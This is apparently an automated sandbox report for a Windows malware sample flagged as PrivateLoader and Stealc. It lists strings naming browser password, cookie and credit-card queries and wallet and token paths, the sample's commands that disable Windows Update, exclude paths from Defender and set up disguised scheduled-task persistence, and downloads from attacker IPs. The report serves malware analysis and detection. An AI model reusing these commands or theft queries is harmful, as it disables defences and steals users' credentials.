InternetCloseHandle

InternetConnectA

InternetCrackUrlA

InternetOpenA

InternetOpenUrlA

InternetReadFile

IsWow64Process

Ism"Yw9)K

J$cqi)q

JohnDoe

JsFbQUw)CG

Ks~lr]QLmP

LoadLibraryA

Local Extension Settings

Local State

LocalAlloc

LocalFree

MultiByteToWideChar

NSS_Init

NSS_Shutdown

Network

Network Info:

OLZuUO,I8

OpenEventA

OpenProcess

Opera

Opera GX Stble

Opera Stable

OperaGX

PATH

PK11SDR_Decrypt

PK11_Authenticate

PK11_FreeSlot

PK11_GetInternalKeySlot

POST

Password

PathMatchSpecA

Pidgin

Process List:

Process32First

Process32Next

ProcessorNameString

ProductName

ReadFile

RegCloseKey

RegEnumKeyExA

RegEnumValueA

RegOpenKeyExA

RegQueryValueExA

ReleaseDC

RmEndSession

RmGetList

RmRegisterResources

RmStartSession

SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-1164440800, name, encrypted_value from cookies

SELECT fieldname, value FROM moz_formhistory

SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies

SELECT name, value FROM autofill

SELECT name_on_card, expiration_month, expiration_year, cardnumber_encrypted FROM credit_cards

SELECT origin_url, username_value, password_value FROM logins

SELECT url FROM moz_places LIMIT 1000

SELECT url FROM urls LIMIT 1000

SHGetFolderPathA

SOFTWARE\Microsoft\Windows NT\CurrentVersion

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

SSCu?C

SelectObject

SetEnvironmentVariableA

SetFilePointer

ShellExecuteExA

Sleep

Software\Microsoft\Office\1.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\

Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\

Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\

Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\

Software\Valve\Steam

SteamPath

StrCmpCA

StrCmpCW

StrStrA

Sync Extension Settings

System Summry:

SystemTimeToFileTime

TRUE

TerminateProcess

User Agents:

VMwareVMware

VirtualAlloc

VirtualAllocExNuma

VirtualProtect

Virtualree

Web Data

WideCharToMultiByte

WqRN|)K

WriteFile

ZtnFv,`86/*i\wf>5?*J|d

\.purple\

\Discord\tokens.txt

\Local Storge\leveldb

\Local Storge\leveldb\CURRENT

\Outlook\accounts.txt

\Steam\

\Telegram Desktop\

\Temp\

\config\

\discord\

\feQ

^[,YuC|rp1

_0.indexeddb.leveldb

_o{)Of#JL"*,],<vqW0AA[5c8e#xSf#>rLd]RNXw^qk+!;@f\[ER\LaE=Z;7Vu[m3BG_Wg3sq|=BvM[TW+-cqBJFvZ:R.k'=2JE`Jg25Ob'ctae~j

_vOkNXvuW][c}+-Sm%VuIF$;MV4o3_yq/m:H=6GQ:?A^KFrb!>+k^0EV5S"sCHAf1f<:aGhzjT

accounts.xml

advapi32.dll

autofill

bcrypt.dll

browser:

browsers

build

card:

chrome

chrome-extension_

config.vdf

cookies.sqlite

crypt32.dll

dA!FZ9Rs

dQw4w9WgXcQ

default5

done

encryptedPassword

encryptedUsername

encrypted_key

fJ}@&CTx-K_{

file

file_name

files

firefox

formSubmitURL

formhistory.sqlite

freebl3.dll

g5w2dJEpq

gR>]^w

gdi32.dll

gdiplus.dll

guid

g{-J+Ml?

hI?eQ,ONK

history

http://185.172.128.79

https

hu`sB-N=P?

hwid

i4sB!RLO

key_datas

libraryfolders.vdf

logins.json

loginusers.vdf

lstrcatA

lstrcpyA

lstrcpynA

lstrlenA

m/`chT,3G;

map*

message

month:

mozglue.dll

msvcp140.dll

name:

nss3.dll

ntdll.dll

oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\

ole32.dll

open

opera

password:

places.sqlite

plugins

profile:

profiles.ini

psapi.dll

p}lBxW\29

rJT=cw

rdBdeCSDCLu

rgf0V\$,B"QX

rstrtmgr.dll

rtv0|j<V :"BLBU

runas

s_]y?@hX!A#w=EMLO=8hVodl4Vz@ lp87M=8L%[uem|tSSJ*=Zp\b+HV|zZI:|><T{5bf kZDZ2yqZLZOGG?O9Sf{>8jQ;n@&bM$W,eA3p@^SlZJeeC&Z"J)lb%vto%1

screenshot.jpg

shell32.dll

shlwapi.dll

soft

softokn3.dll

sqlite3.dll

sqlite3_close

sqlite3_column_blob

sqlite3_column_bytes

sqlite3_column_text

sqlite3_finlize

sqlite3_open

sqlite3_prepare_v2

sqlite3_step

sscanf

ssfn*

system_info.txt

token

token:

url:

user32.dll

usernameField

vcruntime140.dll

wallets

wininet.dll

wsprintfA

wsprintfW

xLdLeUd:Js

xg~rCu(_@Ist

year:

{,iR?[L?<

{.E[H

}YhmwDa

No Malware configuration.

Add for printing

TRiD

.exe	\|	Win64 Executable (generic) (87.3)
.exe	\|	Generic Win/DOS Executable (6.3)
.exe	\|	DOS Executable Generic (6.3)

EXIF

EXE

MachineType:	AMD AMD64
TimeStamp:	2024:01:04 06:27:20+01:00
ImageFileCharacteristics:	No relocs, Executable, Large address aware
PEType:	PE32+
LinkerVersion:	14.34
CodeSize:	1650688
InitializedDataSize:	482816
UninitializedDataSize:	-
EntryPoint:	0x58d587
OSVersion:	6
ImageVersion:	-
SubsystemVersion:	6
Subsystem:	Windows GUI
FileVersionNumber:	1.0.1.6
ProductVersionNumber:	1.0.1.6
FileFlagsMask:	0x003f
FileFlags:	Patched, Private build
FileOS:	Windows NT
ObjectFileType:	Executable application
FileSubtype:	-
LanguageCode:	German
CharacterSet:	Unicode
CompanyName:	DarkLab
FileDescription:	DarkLab
FileVersion:	1.0.1.6
InternalName:	DarkLab.exe
LegalCopyright:	Copyright (C) 2023 DarkLab
OriginalFileName:	DarkLab.exe
ProductName:	DarkLab
ProductVersion:	1.0.1.6

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

288

"C:\Users\admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\admin\AppData\Local\Temp\toolspub2.exe

—

Jmvp_d6dvInBM8B8O47ZK6Sv.exe

User:

admin

Integrity Level:

HIGH

Exit code:

Modules

Images
c:\users\admin\appdata\local\temp\toolspub2.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

328

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

—

cmd.exe

User:

SYSTEM

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

A tool to aid in developing services for WindowsNT

Exit code:

1060

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\sc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll

480

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\cmd.exe

explorer.exe

User:

SYSTEM

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Windows Command Processor

Exit code:

1060

Version:

6.1.7601.17514 (win7sp1_rtm.101119-1850)

Modules

Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll

624

"C:\Users\admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"

C:\Users\admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe

—

Jmvp_d6dvInBM8B8O47ZK6Sv.exe

User:

admin

Integrity Level:

HIGH

Exit code:

Modules

Images
c:\users\admin\appdata\local\temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

760

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Windows PowerShell

Exit code:

Version:

10.0.14409.1005 (rs1_srvoob.161208-1155)

Modules

Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll

852

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

—

cmd.exe

User:

SYSTEM

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Power Settings Command-Line Tool

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\powercfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll

896

sc stop UsoSvc

C:\Windows\System32\sc.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

A tool to aid in developing services for WindowsNT

Exit code:

1060

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\sc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll

964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

explorer.exe

User:

SYSTEM

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Windows PowerShell

Exit code:

Version:

10.0.14409.1005 (rs1_srvoob.161208-1155)

Modules

Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll

972

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ygknjoglr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Windows PowerShell

Exit code:

Version:

10.0.14409.1005 (rs1_srvoob.161208-1155)

Modules

Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll

1036

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\cmd.exe

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Windows Command Processor

Exit code:

1060

Version:

6.1.7601.17514 (win7sp1_rtm.101119-1850)

Modules

Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll

Add for printing

Total events

10 508

Read events

10 330

Write events

161

Delete events

Modification events


(PID) Process:	(2004) explorer.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0
Operation:	write	Name:	CheckSetting
Value: 01000000D08C9DDF0115D1118C7A00C04FC297EB010000000425B8FBD140304D952DBE1156DB516600000000020000000000106600000001000020000000DB7CFDADD20035B54FE72E91B52C386E688080B10C096541937D15768230E9B4000000000E8000000002000020000000FC5BD8C24841EC802021354E72CCCB98F326B765B114F6B99237B0E53C70855230000000E5259FA42E3216E6ABD96FBA3A6491DBFE5EABB7874FD90C6180CAAA39FCB4DA5097AFD783F475C120AF35A7DAD783F44000000017650D25D4C3008FF427790B98E977F1147A37B555438BA5F03FADACC116CEA191D18AD610A15D4BB60F12EF1F1AF002B029515D03AC7340FF8EFA43530BF5CD
(PID) Process:	(3056) 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{DCD851B8-38ED-462C-9AA5-DD991D7AB328}User
Operation:	delete key	Name:	(default)
Value:
(PID) Process:	(3056) 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects
Operation:	delete key	Name:	(default)
Value:
(PID) Process:	(3056) 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{DCD851B8-38ED-462C-9AA5-DD991D7AB328}Machine
Operation:	delete key	Name:	(default)
Value:
(PID) Process:	(3056) 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{DCD851B8-38ED-462C-9AA5-DD991D7AB328}Machine\SOFTWARE
Operation:	delete key	Name:	(default)
Value:
(PID) Process:	(3056) 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{DCD851B8-38ED-462C-9AA5-DD991D7AB328}Machine\SOFTWARE\Policies
Operation:	delete key	Name:	(default)
Value:
(PID) Process:	(3056) 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{DCD851B8-38ED-462C-9AA5-DD991D7AB328}Machine\SOFTWARE\Policies\Microsoft
Operation:	delete key	Name:	(default)
Value:
(PID) Process:	(3056) 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{DCD851B8-38ED-462C-9AA5-DD991D7AB328}Machine\SOFTWARE\Policies\Microsoft\Windows Defender
Operation:	delete key	Name:	(default)
Value:
(PID) Process:	(3056) 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{DCD851B8-38ED-462C-9AA5-DD991D7AB328}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions
Operation:	delete key	Name:	(default)
Value:
(PID) Process:	(3056) 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{DCD851B8-38ED-462C-9AA5-DD991D7AB328}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions
Operation:	delete key	Name:	(default)
Value:

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
3056	629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K78MRVB5\tmvwr[1].bmp		—
		MD5:—	SHA256:—
3056	629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	C:\Users\admin\Documents\GuardFox\obpv7W2EtHKLDkr1kzO1X_In.exe		—
		MD5:—	SHA256:—
3056	629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	C:\Windows\System32\GroupPolicy\gpt.ini		text
		MD5:39DFFC602ED934569F26BE44EC645814	SHA256:B57A88E5B1ACF3A784BE88B87FA3EE1F0991CB7C1C66DA423F3595FFC6E0C5C2
3056	629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	C:\Windows\System32\GroupPolicy\Machine\Registry.pol		binary
		MD5:CDFD60E717A44C2349B553E011958B85	SHA256:0EE08DA4DA3E4133E1809099FC646468E7156644C9A772F704B80E338015211F
3056	629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\MBKILGVJ.txt		text
		MD5:4DAE025D566981A94EFADF6811C3AD51	SHA256:43CFE7E71C5564D5EF4D1E1BD69C29F605773A66FC578E103492D2BFE06A47EB
3056	629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	C:\Users\admin\Documents\GuardFox\Jmvp_d6dvInBM8B8O47ZK6Sv.exe		executable
		MD5:0BCEB16289ED364E1FAC2EE3A01A80B9	SHA256:B9123819355DB41CC62D65F22ECE1E37D2E129469788559FEA04625A8C80266F
3032	Jmvp_d6dvInBM8B8O47ZK6Sv.exe	C:\Users\admin\AppData\Local\Temp\InstallSetup8.exe		executable
		MD5:1B7371528055D2F89C782F621C60D2E6	SHA256:0198998DF660EE268A694A15874D5F4D19C3ED7D3446C482D8665657693BDC9D
2084	InstallSetup8.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\syncUpd[1].exe		executable
		MD5:0CA217855047438F5392B17C8BEF4E5A	SHA256:B52C900CB900DB52DAA313947099CB5F5D5A9FBB0C5F9AE5B3F39DD7AA9E4B6D
972	powershell.exe	C:\Users\admin\AppData\Local\Temp\uvl05x1h.pm0.ps1		binary
		MD5:C4CA4238A0B923820DCC509A6F75849B	SHA256:—
3032	Jmvp_d6dvInBM8B8O47ZK6Sv.exe	C:\Users\admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe		executable
		MD5:544D878C54FDB213A631ACF991F09D24	SHA256:826F8F747E844D8F9D5ADE773A77C0EB6480F1C7DAB5E7995044DF3B2474B9AD

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
3056	629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	GET	200	45.15.156.229:80	http://45.15.156.229/api/bing_release.php	unknown	text	8 b	unknown
3056	629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	POST	200	45.15.156.229:80	http://45.15.156.229/api/flash.php	unknown	text	108 b	unknown
3056	629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	POST	200	45.15.156.229:80	http://45.15.156.229/api/flash.php	unknown	text	512 b	unknown
3056	629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	HEAD	200	185.172.128.19:80	http://185.172.128.19/latestbuild.exe	unknown	—	—	unknown
3056	629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	GET	200	185.172.128.19:80	http://185.172.128.19/latestbuild.exe	unknown	executable	6.65 Mb	unknown
2084	InstallSetup8.exe	GET	200	173.231.16.77:80	http://api.ipify.org/?format=dfg	unknown	text	14 b	unknown
3056	629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	POST	200	45.15.156.229:80	http://45.15.156.229/api/flash.php	unknown	text	108 b	unknown
2484	nsgAD1D.tmp	POST	200	185.172.128.79:80	http://185.172.128.79/3886d2276f6914c4.php	unknown	text	1.48 Kb	unknown
2084	InstallSetup8.exe	GET	200	185.172.128.53:80	http://185.172.128.53/syncUpd.exe	unknown	executable	203 Kb	unknown
2084	InstallSetup8.exe	GET	200	91.92.254.7:80	http://91.92.254.7/scripts/plus.php?ip=216.24.216.211&substr=eight&s=ab	unknown	binary	1 b	unknown

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
4	System	192.168.100.255:137	—	—	—	whitelisted
1220	svchost.exe	239.255.255.250:3702	—	—	—	whitelisted
352	svchost.exe	224.0.0.252:5355	—	—	—	unknown
3056	629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	45.15.156.229:80	—	Galaxy LLC	RU	malicious
3056	629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	104.26.8.59:443	api.myip.com	CLOUDFLARENET	US	unknown
3056	629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	34.117.186.192:443	ipinfo.io	GOOGLE-CLOUD-PLATFORM	US	unknown
3056	629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	87.240.129.133:80	vk.com	VKontakte Ltd	RU	unknown
3056	629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	185.172.128.19:80	—	OOO Nadym Svyaz Service	RU	unknown
3056	629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	87.240.129.133:443	vk.com	VKontakte Ltd	RU	unknown
3056	629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	95.142.206.2:443	sun6-22.userapi.com	My.com B.V.	NL	unknown

DNS requests

Domain	IP	Reputation
api.myip.com	104.26.8.59 104.26.9.59 172.67.75.163	malicious
ipinfo.io	34.117.186.192	shared
vk.com	87.240.129.133 87.240.137.164 87.240.132.78 87.240.132.67 87.240.132.72 93.186.225.194	whitelisted
teredo.ipv6.microsoft.com	—	unknown
sun6-22.userapi.com	95.142.206.2	unknown
api.ipify.org	173.231.16.77 64.185.227.156 104.237.62.212	shared
ctldl.windowsupdate.com	2.22.242.138 2.22.242.122 2.22.242.82 2.22.242.83	whitelisted
xmr-asia1.nanopool.org	51.79.145.144 172.104.165.191 103.3.62.64 51.79.145.202	unknown
host-file-host6.com	172.67.172.189 104.21.30.102	unknown

Threats

PID	Process	Class	Message
3056	629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	Device Retrieving External IP Address Detected	ET INFO Observed External IP Lookup Domain in TLS SNI (api .myip .com)
3056	629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	Device Retrieving External IP Address Detected	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)
3056	629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	A Network Trojan was detected	ET MALWARE Suspected PrivateLoader Activity (POST)
3056	629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	A Network Trojan was detected	LOADER [ANY.RUN] PrivateLoader Check-in
3056	629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	A Network Trojan was detected	ET MALWARE Suspected PrivateLoader Activity (POST)
3056	629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	A Network Trojan was detected	LOADER [ANY.RUN] PrivateLoader Check-in
3056	629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	Potentially Bad Traffic	ET INFO Executable Download from dotted-quad Host
3056	629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	Potentially Bad Traffic	ET INFO Executable Download from dotted-quad Host
3056	629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	Potential Corporate Privacy Violation	ET POLICY PE EXE or DLL Windows file download HTTP
3056	629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe	Potentially Bad Traffic	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response

1 ETPRO signatures available at the full report

Add for printing

No debug info

General Info

629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe

D8D52A95B809C586AFE1BBF5373EDFC4

4081F7D0211614DF482969BA5AF1F29E5AB2BEE7

629E031747E94B66F85F83711433A1C3D084AC0A57FBCC58F970BE04DE2D48CB

98304:NOxI+diXhOFO76AwMG20rfwTmgXwZl9sdVCdqksQ18E+jOIjyN+VtmKNhBrqNTY4:fwUm2ikgoeSUaZm5dCa

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

Actions looks like stealing of personal data

Creates a writable file in the system directory

Uses Task Scheduler to autorun other applications

Runs injected code in another process

Steals credentials from Web Browsers

Starts CMD.EXE for self-deleting

STEALC has been detected (YARA)

SUSPICIOUS

Reads settings of System Certificates

Reads security settings of Internet Explorer

Reads the Internet Settings

Checks Windows Trust Settings

Starts application with an unusual extension

Uses powercfg.exe to modify the power settings

Starts SC.EXE for service management

Searches for installed software

Drops a system driver (possible attempt to evade defenses)

Uses TIMEOUT.EXE to delay execution

The process verifies whether the antivirus software is installed

Starts CMD.EXE for commands execution

Reads browser cookies

INFO

Drops the executable file immediately after the start

Checks supported languages

Reads the computer name

Checks proxy server information

Create files in a temporary directory

Process checks computer location settings

Reads the machine GUID from the registry

Connects to the CnC server

Process requests binary or script from the Internet

Checks for external IP

PRIVATELOADER has been detected (SURICATA)

Connects to the server without a host name

Creates files or folders in the user directory

Manual execution by a user

Executes as Windows Service

Starts POWERSHELL.EXE for commands execution

Script adds exclusion path to Windows Defender

Adds path to the Windows Defender exclusion list

Starts CMD.EXE for commands execution

The process executes via Task Scheduler

Creates files in the program directory

Application launched itself

Uses Task Scheduler to run other applications

Reads product name

STEALC has been detected (SURICATA)

Reads CPU info

Reads Environment values

Unusual connection from system programs

Steals credentials

Application was injected by another process

The process drops Mozilla's DLL files

Connects to unusual port

The process drops C-runtime libraries

The Powershell connects to the Internet

SMOKE has been detected (SURICATA)

Process drops legitimate windows executable

Reads the Internet Settings

Malware configuration

Stealc

Static information

TRiD

EXIF

EXE

Video and screenshots

Processes

Behavior graph

Specs description